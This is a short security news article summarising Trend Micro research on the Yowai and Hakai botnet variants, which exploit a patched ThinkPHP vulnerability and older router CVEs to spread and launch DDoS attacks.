The ThinkPHP vulnerability which allows attackers to gain control over web servers was patched in December 2018. However, cybercriminals were spotted exploiting this ThinkPHP vulnerability for botnet propagation by Mirai variant Yowai and Gafgyt variant Hakai.
Moreover, attackers use websites created using PHP framework to breach web servers via dictionary attack and gain control of these routers for DDoS (Distributed Denial of Service) attacks. Trend Micro’s telemetry revealed that Hakai and Yowai caused a sudden increase in attacks between January 11-17, 2019.
Mirai variant Yowai
Researchers from Trend Micro observed that Yowai adds ThinkPHP vulnerability to its list of infection entry vectors along with the other known vulnerabilities. TrendMicro explained in a blog that Yowai listens on port 6 to receive commands from C&C server.
Apart from ThinkPHP vulnerability, Yowai has exploited other vulnerabilities such as CVE-2014-8361, a Linksys RCE, CVE-2018-10561, CCTV-DVR RCE.
Gafgyt variant Hakai
Gafgyt variant Hakai has been observed exploiting router vulnerabilities for propagation and infecting Internet of Things (IoT ) devices. Researchers from TrendMicro observed that the Hakai sample (detected by Trend Micro as BACKDOOR.LINUX.HAKAI.AA) explored bugs that remained unpatched in systems and added exploits for vulnerabilities in ThinkPHP and other vulnerabilities to propagate and perform DDoS attacks.
The other vulnerabilities included D-Link DSL-2750B router vulnerability, CVE-2015-2051, CVE-2014-8361, and CVE-2017-17215.
“Interestingly, the Hakai sample we examined contained codes copied from Mirai, specifically the functions used for encrypting its configuration table. However, the functions we’ve identified are not operational, we suspect that the codes for telnet dictionary attack were intentionally removed to make this Hakai variant stealthier,” researchers explained in the blog.
Researchers noted that ThinkPHP is a free open source frame which can be easily exploited by attackers by abusing Yowai and Hakai to breach web servers and websites.